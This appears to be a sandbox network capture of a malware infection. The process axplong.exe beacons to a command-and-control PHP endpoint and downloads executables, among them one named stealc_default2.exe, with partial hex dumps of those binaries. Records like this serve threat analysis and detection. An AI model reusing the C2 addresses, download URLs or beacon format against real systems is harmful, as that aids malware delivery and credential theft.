1	192.168.2.8	49712	52.212.52.84	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:04.431611061 CEST	71	OUT	GET /3823166/crypted.exe?hash=AgADZl HTTP/1.1 Host: ddl.safone.dev
Sep 3, 2024 17:13:05.130538940 CEST	843	IN	HTTP/1.1 200 OK Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1725376385&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=8Q88V0MdcrE8WcU7dm%2BvPo%2B9vTyE3YRpmhqntU9vHRo%3D"}]} Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1725376385&sid=c4c9725f-1ab0-44d8-820f-430df2718e11&s=8Q88V0MdcrE8WcU7dm%2BvPo%2B9vTyE3YRpmhqntU9vHRo%3D Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]} Connection: keep-alive Content-Type: application/x-msdownload Range: bytes=0-322047 Content-Range: bytes 0-322047/322048 Content-Disposition: attachment; filename="crypted.exe" Accept-Ranges: bytes Content-Length: 322048 Date: Tue, 03 Sep 2024 15:13:05 GMT Server: Python/3.8 aiohttp/3.9.3 Via: 1.1 vegur
Sep 3, 2024 17:13:05.274153948 CEST	1236	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL`f @ @_`
Sep 3, 2024 17:13:05.274235010 CEST	1236	IN	Data Raw: 20 22 1e d8 80 30 c2 78 6b 1b d6 5f 39 be 9b 23 52 16 e8 df 50 7a 05 cd e0 47 c8 17 e5 fa 65 bf 90 1c a6 79 0f 15 d9 4a 4d bd 18 7e a5 98 c3 c3 17 47 8e 34 13 bb 2a 21 3d 93 20 90 89 61 1e e4 aa 1c 8a 6a 23 67 54 e1 ad 5c 8e b4 ab 3d 8b c2 83 cb Data Ascii: "0xk_9#RPzGeyJM~G4!= aj#gT\=rT)]qjj'$r~Sa_@I/G}"NuKdTa(&%:yh#,pV-Bk:=;rGk:'Xr%4Vi3&}U
Sep 3, 2024 17:13:05.274247885 CEST	1236	IN	Data Raw: 94 e0 2e b2 8f 8c cb bf e5 dd 11 38 64 48 19 73 4a 9c b6 eb 74 0a e9 be 5a ca 07 56 70 d6 55 1f 36 6c a1 19 87 46 73 9d 0d c4 1e 5d 7a b7 8d 55 09 b6 87 a5 61 84 7c 6b be 0d a5 d3 63 5c 10 e6 b9 50 a0 e7 59 3d 92 76 4e 72 30 1f c4 6f 76 d5 04 8b Data Ascii: .8dHsJtZVpU6lFs]zUa\|kc\PY=vNr0ovAb;>[Y)0d[UY`>wm+.9YqAdbJE/1"VccJa>*h\aNp]R h;.gYnlWF +]>PR+]aqe(w}
Sep 3, 2024 17:13:05.274261951 CEST	1236	IN	Data Raw: 65 85 57 85 28 f2 38 38 b4 0a 64 85 8e ac ac 7c 15 27 59 6f f8 f6 71 0d b0 db a7 cf 52 b0 3b 05 ee 0e 31 48 f4 b4 8e 69 64 4a 3e 87 90 8d 25 26 8c f2 0b 52 da 0e 36 b5 17 ad 5a 4b ed e2 9b 8e f5 2b d2 01 a4 40 1a 94 8b 3c 81 dc 1a 9c 15 60 dd 5d Data Ascii: eW(88d\|'YoqR;1HidJ>%&R6ZK+@<`]M$g:U7y@hHbE*nW$6vBOAb-9liETJ%7>`5qtI#}o'o['5rs7^p@oNsqV#Nv\|:b+
Sep 3, 2024 17:13:05.280402899 CEST	896	IN	Data Raw: 66 a5 b5 13 0d 0f 44 a1 dd fa 13 1f 91 41 ca 4a 00 0f 29 48 da 01 86 7f 1f 8a ca d0 be d8 b5 f0 e1 3a 12 04 b1 b3 70 1e a7 38 b8 71 85 b2 03 09 37 f4 c8 b5 be c9 12 d8 9b d9 bb 40 dc 4c 39 85 1d f9 34 83 8d c0 c0 f8 6c d2 46 dc 52 eb 0a ff eb c1 Data Ascii: fDAJ)H:p8q7@L94lFR~'@\^LG?"6^CqsE?'_&6-f'9WOb*@XaD ,L'h^.lB?I3 %2sGrlS]ww{aY>gwA
Sep 3, 2024 17:13:05.280416012 CEST	1236	IN	Data Raw: b4 66 ce c4 4d 12 1f c8 83 e5 f5 17 cf b9 1f 2f 94 d2 d6 94 b2 d2 b7 36 10 3e cb 24 b1 da 7e 29 c6 e0 0f d7 02 b1 49 62 c4 c4 be 49 96 af 08 0e 3a 16 ae 2e 49 ab 90 c7 84 3a 66 08 d8 71 1c a0 2c c8 a3 dd 53 26 8d fc f5 b9 cc aa 28 23 83 13 9a 19 Data Ascii: fM/6>$~)IbI:.I:fq,S&(#\B{=crx3pL3T~7T<tfZBF>OKvV\|@VJdi'{.]<ZXkK<L-8tXykKr6I\|VBF
Sep 3, 2024 17:13:05.280426979 CEST	1236	IN	Data Raw: e1 5e ad 98 6a 9e 4f 4d e8 6e 2e 2e ae e3 db 06 6a 80 77 0d 9e 53 be ae 26 bd 47 1c 02 ae c5 ec 27 37 ab bd 6e a1 67 0d fe 4f a4 73 f2 c6 f5 ec 7f 08 9c 39 5d 36 b2 3f b7 bc 00 55 cd 3c 42 03 1c f5 d0 28 d3 de 65 56 87 d9 ff a0 a8 a1 75 66 7c 3b Data Ascii: ^jOMn..jwS&G'7ngOs9]6?U<B(eVuf\|;K(@XzZBt&op#<:==T3==Z~R%Bs6~VfNd>j'ssGX]w.]8h:,Rr72A>S!uqI)
Sep 3, 2024 17:13:05.280436039 CEST	1236	IN	Data Raw: 46 58 6d 7f 69 3e ac 2d 02 65 32 da ca c4 58 d1 25 b2 42 d6 da 28 70 db a5 c1 d9 d5 6e b1 bc c7 b9 1f c9 3f 51 e8 71 1f 00 56 ff 66 72 2c 76 7a 1f 4d af 7d e1 37 c6 3c 45 ab c1 ee 4b 6b 11 2a 67 ac ea 91 6a c9 d9 36 ab 05 6f 00 c1 fe 01 bd 4f ec Data Ascii: FXmi>-e2X%B(pn?QqVfr,vzM}7<EKk*gj6oOmW\|1DBCuq,_4\06Mn2Xr/b+fx.<IVcnwv=lE GwI,<{h)0Y^3DN5_
Sep 3, 2024 17:13:05.280459881 CEST	1236	IN	Data Raw: 16 40 50 b1 4a b3 38 f0 25 31 66 48 f2 01 65 e5 1b 74 96 ef 4c 48 3c d3 02 76 7e 53 be 50 6d ab b7 95 e3 92 08 0b aa ce 00 bb 9d b3 d2 d7 75 c1 30 33 e0 73 e0 5f af 0c 62 9b 51 39 6e 4c 1d e1 7f 7a 7e 94 24 27 41 21 bb cf c9 b5 df 6d d0 c5 7d 56 Data Ascii: @PJ8%1fHetLH<v~SPmu03s_bQ9nLz~$'A!m}VGx.P)Rdne/N<!nBWQ)6\|H/k+FT}YJ2CQqaK(GB\D2e7~!ButB7tLA
Sep 3, 2024 17:13:05.280472040 CEST	1236	IN	Data Raw: 65 06 f9 19 6b 2e c1 3c 08 cd 6a f8 a7 58 cc ff 92 d5 e0 88 85 42 03 5e 36 a5 3c 5f e6 90 10 e9 30 3b 2c 40 23 16 00 43 39 64 a8 cb 67 1e c3 20 3f 3a 88 7b 19 0c 29 ce 8f 54 07 65 6b 4f 9b e7 7e 6c 57 51 72 67 9d 9d 8f 24 f7 84 78 f1 58 67 54 bd Data Ascii: ek.<jXB^6<_0;,@#C9dg ?:{)TekO~lWQrg$xXgT}"\|4@c[e*xaA/PswhGeg<MJiiY+7m3m(/Fi/S\|PjQteR6!\|s{ZV'Eg{h2U2rC!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49713	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:06.350121975 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Sep 3, 2024 17:13:07.196070910 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 3, 2024 17:13:07.543575048 CEST	56	OUT	GET /inc/crypteda.exe HTTP/1.1 Host: 185.215.113.16
Sep 3, 2024 17:13:07.835510015 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:07 GMT Content-Type: application/octet-stream Content-Length: 1104936 Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT Connection: keep-alive ETag: "66c34110-10dc28" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5c 08 c3 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 ac 10 00 00 08 00 00 00 00 00 00 1e ca 10 00 00 20 00 00 00 e0 10 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 11 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc c9 10 00 4f 00 00 00 00 e0 10 00 b0 05 00 00 00 00 00 00 00 00 00 00 00 b6 10 00 28 26 00 00 00 00 11 00 0c 00 00 00 94 c8 10 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL\f @ `O(& H.text$ `.rsrc@@.reloc@BHLvlTp#E'&@cCtE% pr*QAUv6V=CxGHEi(hhqBf}gL-S1),p$8ij37!TsT[XPUEcjs]EqXwsSYg)7IOKm(d(T0`V`oEG#Iqlh9+>6Q=S -#]rAR1?[}ljqD$NxE1px[h~idu!x
Sep 3, 2024 17:13:07.835525990 CEST	164	IN	Data Raw: a8 6f 02 c3 44 0b cf 79 75 65 b6 a9 e5 53 cc 1d 2f 7a 18 99 3e 0f 7c c6 21 e6 20 96 30 e8 bd 5e 1b f7 ca b8 77 ac 58 c0 9c 99 22 d0 f8 f1 50 39 cf 31 b1 8b e2 03 cb 10 7c cf 40 6c cf 13 ee cf f8 ae c3 d3 1d 4c f4 43 0f 60 6c 3e dc e5 43 55 f5 73 Data Ascii: oDyueS/z>\|! 0^wX"P91\|@lLC`l>CUsH1Ucjv)X+nK6w: ZUa.Ll?rX]083G$)Ms@' dAMm8F
Sep 3, 2024 17:13:07.835536003 CEST	1236	IN	Data Raw: 59 8d b2 7e 67 7d 78 5f 42 0a 2f ad e3 51 8e ea e5 f4 c0 14 4b 25 62 5b 1f b2 f8 10 46 0f e8 71 01 07 c6 f4 e1 de 8b a0 85 e5 e3 d3 83 8e 14 ca c3 48 eb 37 15 3e 26 d0 bd 03 f8 36 51 1f 86 78 5a 79 a0 94 95 4e aa b6 da 5d 3d 57 91 96 a1 11 ea 11 Data Ascii: Y~g}x_B/QK%b[FqH7>&6QxZyN]=Wyym:AndnRs_5`=69W=wxk\LiVA pRTQ\|u9=0=KIFo\n/w}UOs\|V5TT02+^,vXO+?zrZIy;F
Sep 3, 2024 17:13:07.835608959 CEST	1236	IN	Data Raw: 51 fa 08 04 53 78 fd e5 03 cb 18 f6 58 45 b0 d8 8e cf 0f b3 9e 15 68 f3 0f c6 75 65 b1 1d 43 82 96 11 ff 8d cb df ce 5e 3b ee bf f0 94 1f 0a d9 4a c7 23 18 cb 51 98 b1 5b 5b 66 83 33 e6 9f c3 6d de ff 7a ee c4 e5 39 0f f0 e0 0b 59 eb bc bc 94 cd Data Ascii: QSxXEhueC^;J#Q[[f3mz9Y'@KQNgl@5}\|."s},cE!es_RwJ7RyR$]0-GK7yaLr/?Bg_yIVjLB5Ul=@
Sep 3, 2024 17:13:07.835623980 CEST	328	IN	Data Raw: 68 41 e8 d1 24 61 59 f1 85 4d 91 cf 05 4f 7f f1 57 40 8e 83 8f 7f 1e f5 08 24 f0 ca 04 ee d2 6d a6 47 52 fc 79 7a c7 38 d4 ce 9e ae e1 c3 9b b0 5c 81 1c b8 63 eb 69 91 cc cd 7d 11 ac 13 78 e9 91 c3 d8 12 6b f8 03 75 b5 5d b7 4e 5e 6d 60 4d 3a 50 Data Ascii: hA$aYMOW@$mGRyz8\ci}xku]N^m`M:Pv:%y&zUcBO'_5DMXMSikU#F3D8M<@xBkP:3?/O~&p/wk7[.%m~'
Sep 3, 2024 17:13:07.835731983 CEST	1236	IN	Data Raw: f6 bb 13 3a 6b 70 d0 2e 21 18 a7 9c 50 d5 80 bb c1 7c 49 29 4b 54 1e fb 58 bc 33 2f d7 c9 b9 4a a0 e8 05 d3 4e 68 5a 3d 2e 42 82 4c ee e4 56 1b c0 c8 e0 25 a5 3d 4b 27 bf c1 3e 2f 77 2a 3a de 48 e2 62 93 e4 bb d0 12 16 d2 5a 5c 99 e5 19 a7 90 3b Data Ascii: :kp.!P\|I)KTX3/JNhZ=.BLV%=K'>/w*:HbZ\;INPefGJHqnTJs3<{o\{]Dq5?5vlH~\|(cEGjp%eAmx<l6#>q@\|)Istan
Sep 3, 2024 17:13:07.835741997 CEST	224	IN	Data Raw: f2 76 dc f3 0a 1d 00 15 3c 70 ef e9 d1 b3 7e b3 a6 cc fe 88 08 02 23 a8 a5 29 9c 32 71 9d 36 f7 a0 91 1a 6e bb b3 e5 cf 9f f5 d1 7f 13 11 88 fd 7a 6e ec 24 72 41 cc ab 8e ec c0 29 ad 7e b8 05 80 ac 21 fa 4c da 7f 54 f2 e1 ff 55 3a 40 75 c1 99 1b Data Ascii: v<p~#)2q6nzn$rA)~!LTU:@uqqzw<CZ2)6[-{(^;#ib\~i&~DL<o1$BD)um,\|#ws@v
Sep 3, 2024 17:13:07.835803986 CEST	1236	IN	Data Raw: 21 26 c3 b8 a8 5b 8c f7 f4 e3 eb f6 a6 0d db 57 c3 80 16 ba 0d 31 ee c4 66 34 49 1f d1 e0 e1 08 56 a1 f9 91 52 ed 21 ab 6c d0 7b b1 34 41 44 1a 5c 2a 21 83 07 2d 31 4a 7a 6c 24 da 7f 99 1b 05 44 ab 53 73 41 8e 91 05 0f 34 e4 4c 74 0f 60 86 62 9b Data Ascii: !&[W1f4IVR!l{4AD\!-1Jzl$DSsA4Lt`b'r9OUL(oz%klW.n)4s:F1qDq1Ombn.fH~NU #T?~gK-0;ltA@%B;XevP m
Sep 3, 2024 17:13:07.835819006 CEST	1236	IN	Data Raw: 45 0d b7 a7 b4 de a4 09 09 62 6d 4f d9 bf bf fe a2 44 3b f7 ec 38 f2 88 e8 a9 b8 6d 4e ce f8 ac 8f 80 f7 96 0b 24 ea de ea 27 92 2b 20 f7 b0 17 5f 89 6e b6 08 33 c9 15 a4 f9 0c 24 b7 c9 75 2b 78 00 f4 0d ff f9 83 28 72 49 ea d0 c9 c3 55 78 e1 00 Data Ascii: EbmOD;8mN$'+ _n3$u+x(rIUxmW<~#ymQLOjTwROt?[r`dOD]UX"Viv-'B$fG=w,nuZg!"iatf
Sep 3, 2024 17:13:07.835832119 CEST	268	IN	Data Raw: 08 3c ae 26 71 eb 4c 16 b7 75 3e b9 2b 2e 10 c5 fd 52 40 dc ec a4 d7 e2 b5 d1 bf e2 df e3 66 62 cc c6 32 2f 7d e0 64 1f 3b aa 1d bf 70 47 77 e7 33 ea 0f 2b 3e 57 58 0a 8e b0 bf c5 42 ea a7 00 5b 3c 4d 67 31 73 8b 82 97 2b ae 92 f8 76 37 0d c5 e6 Data Ascii: <&qLu>+.R@fb2/}d;pGw3+>WXB[<Mg1s+v7q'' K7F(~5<Y^\|G !7"B"A2&B&}\(Ov_(P-!iIV,p/r5/~gLfL\|Edsro%%MJ[%@\|
Sep 3, 2024 17:13:07.836152077 CEST	1236	IN	Data Raw: 2e 2f 2c 15 49 d1 75 30 9f 4a b0 a9 48 6d 98 4e ba 0f a9 42 11 16 8e 7e ae 85 38 7a 57 bd 54 cd 64 1b 53 bc 6f 46 8a 06 83 e8 f0 cc 20 9d 5b 1d 41 ce b7 05 3f a8 57 c1 62 bb d2 9c 93 74 2e 99 8d 4f 08 67 f6 fa d2 a2 6a ee 6b db 1c 02 82 32 79 eb Data Ascii: ./,Iu0JHmNB~8zWTdSoF [A?Wbt.Ogjk2yJFAyfsb_\A>C(os2Qp!L`B;'y`>ej_@C;x2B=D+g"<Y9pWEz3yhmV%F(\|b,8OC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:10.256920099 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000004001&unit=246122658369
Sep 3, 2024 17:13:10.974071026 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49719	185.215.113.26	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:11.030536890 CEST	50	OUT	GET /Nework.exe HTTP/1.1 Host: 185.215.113.26
Sep 3, 2024 17:13:11.902905941 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:11 GMT Content-Type: application/x-msdos-program Content-Length: 425984 Connection: keep-alive Last-Modified: Sat, 24 Aug 2024 17:17:20 GMT ETag: "68000-620711078a800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a0 15 ca 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 45 d7 01 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELfE@@D<L8@.text `.rdata8@@.data\|f 4@.rsrc0@@.reloc<LN2@B
Sep 3, 2024 17:13:11.902926922 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 68 60 c0 44 00 e8 a5 c4 01 00 59 c3 cc cc cc cc 68 00 c0 Data Ascii: h`DYhDYj h`E<,FnhDtYj hE$2Fnh DTYjhE2FnhD4Yj hE\-FnhDYjhE1Fonh@
Sep 3, 2024 17:13:11.902940989 CEST	1236	IN	Data Raw: 00 e8 14 c0 01 00 59 c3 cc cc cc 6a 04 68 6c 85 45 00 b9 b4 2f 46 00 e8 6f 6a 01 00 68 40 ce 44 00 e8 f4 bf 01 00 59 c3 cc cc cc 6a 04 68 74 85 45 00 b9 f0 34 46 00 e8 4f 6a 01 00 68 a0 ce 44 00 e8 d4 bf 01 00 59 c3 cc cc cc 6a 04 68 7c 85 45 00 Data Ascii: YjhlE/Fojh@DYjhtE4FOjhDYjh\|E41F/jhDYjhE5Fjh`DYjhE2FihDtYjhEFih DTYjhEFihD4YjhE
Sep 3, 2024 17:13:11.903053999 CEST	492	IN	Data Raw: 36 46 00 e8 af 65 01 00 68 80 dc 44 00 e8 34 bb 01 00 59 c3 cc cc cc 6a 14 68 50 87 45 00 b9 7c 34 46 00 e8 8f 65 01 00 68 e0 dc 44 00 e8 14 bb 01 00 59 c3 cc cc cc 6a 10 68 68 87 45 00 b9 2c 2a 46 00 e8 6f 65 01 00 68 40 dd 44 00 e8 f4 ba 01 00 Data Ascii: 6FehD4YjhPE\|4FehDYjhhE,*Foeh@DYjh\|ED-FOehDYjhE</F/ehDYjhE,Feh`DYjhE.FdhDtYjhED0Fdh DTY
Sep 3, 2024 17:13:11.903197050 CEST	1236	IN	Data Raw: 00 e8 54 b9 01 00 59 c3 cc cc cc 6a 3c 68 b0 88 45 00 b9 7c 2b 46 00 e8 af 63 01 00 68 80 e2 44 00 e8 34 b9 01 00 59 c3 cc cc cc 6a 0c 68 f0 88 45 00 b9 7c 31 46 00 e8 8f 63 01 00 68 e0 e2 44 00 e8 14 b9 01 00 59 c3 cc cc cc 6a 08 68 00 89 45 00 Data Ascii: TYj<hE\|+FchD4YjhE\|1FchDYjhE/Foch@DYjhET/FOchDYjhE1F/chDYj@h(E)Fch`DYjPhpE5FbhDtYjhE
Sep 3, 2024 17:13:11.903247118 CEST	1236	IN	Data Raw: 00 59 c3 cc cc cc cc 6a 3f 68 e0 8c 45 00 b9 a4 30 46 00 e8 df 5e 01 00 68 80 f1 44 00 e8 64 b4 01 00 59 c3 cc cc cc 68 e0 f2 44 00 e8 55 b4 01 00 59 c3 cc cc cc cc 6a 02 68 b4 85 46 00 e8 7f a4 01 00 68 60 f3 44 00 e8 39 b4 01 00 83 c4 0c c3 cc Data Ascii: Yj?hE0F^hDdYhDUYjhFh`D9jhF_hpDjhD@pFh DYhDYhSF$vDYjhSFhDhDY
Sep 3, 2024 17:13:11.903259039 CEST	1236	IN	Data Raw: 06 8b ce 5f 5e ff 60 04 5f 5e c3 cc cc cc cc cc cc cc cc 33 c0 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c a1 14 20 46 00 33 c5 89 45 fc 8b 55 08 8d 45 f4 56 8b f1 89 55 f4 8d 4e 04 c6 45 f8 01 51 0f 57 c0 c7 06 94 05 45 00 50 66 Data Ascii: _^`_^3U F3EUEVUNEQWEPfME3^]UVWFPEfEPiE^]UEEA]UEUH]
Sep 3, 2024 17:13:11.903269053 CEST	492	IN	Data Raw: 8b ec 56 8b 75 08 0f 57 c0 57 8b f9 8d 47 04 50 c7 07 94 05 45 00 66 0f d6 00 8d 46 04 50 e8 18 0d 03 00 c7 07 8c 06 45 00 83 c4 08 8b 46 0c 89 47 0c 8b 46 10 89 47 10 8b c7 5f 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 6c 81 Data Ascii: VuWWGPEfFPEFGFG_^]lEUQEVuWPuFFyAu+QRT_^]UEVtjV0^]hFh AhF\@F
Sep 3, 2024 17:13:11.903301954 CEST	1236	IN	Data Raw: e5 5d c3 55 8b ec 83 ec 10 56 6a 14 e8 75 a6 01 00 8b 4d 08 8b f0 8b 45 0c 0f 57 c0 56 89 75 fc 0f 11 06 c7 46 10 00 00 00 00 c7 06 00 00 00 00 c7 46 04 50 2b 40 00 89 76 08 89 4e 0c 89 46 10 e8 a5 8a 01 00 83 c4 08 85 c0 75 07 5e 8b e5 5d c2 08 Data Ascii: ]UVjuMEWVuFFP+@vNFu^]Q(htEMhEEP.UjhDdPV F3PEdVEjVJMdY^]UjhDd
Sep 3, 2024 17:13:11.903311968 CEST	224	IN	Data Raw: 03 83 c8 ff f0 0f c1 47 04 48 75 10 8b 07 8b cf ff 50 04 eb 07 c6 45 e7 01 8d 5f 08 56 c7 45 fc 01 00 00 00 e8 77 94 01 00 83 c4 04 85 c0 0f 85 c6 00 00 00 c7 45 fc ff ff ff ff 38 45 e7 0f 84 92 00 00 00 33 f6 b9 01 00 00 00 f0 0f b1 0b 85 c0 74 Data Ascii: GHuPE_VEwE8E3tw$1@!;tlt`Ww4fEVuEukEE_8GduVSeu78GdtVEu0Md
Sep 3, 2024 17:13:11.907826900 CEST	1236	IN	Data Raw: 59 5f 5e 5b 8b 4d f0 33 cd e8 d2 9c 01 00 8b e5 5d c2 04 00 50 e8 3f 8f 01 00 50 e8 39 8f 01 00 50 e8 33 8f 01 00 50 e8 2d 8f 01 00 0f 1f 00 67 31 40 00 67 31 40 00 67 31 40 00 67 31 40 00 55 8b ec 6a ff 68 90 88 44 00 64 a1 00 00 00 00 50 51 56 Data Ascii: Y_^[M3]P?P9P3P-g1@g1@g1@g1@UjhDdPQV F3PEdtAHuPMdY^]UjhDdPV F3PEduuEPjMdY^]U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49723	185.215.113.16	80	3212	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 3, 2024 17:13:13.660245895 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 30 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000005001&unit=246122658369
Sep 3, 2024 17:13:14.463332891 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Sep 3, 2024 17:13:14.464725971 CEST	63	OUT	GET /inc/stealc_default2.exe HTTP/1.1 Host: 185.215.113.16
Sep 3, 2024 17:13:14.714848042 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 03 Sep 2024 15:13:14 GMT Content-Type: application/octet-stream Content-Length: 192000 Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT Connection: keep-alive ETag: "66c9f4f9-2ee00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 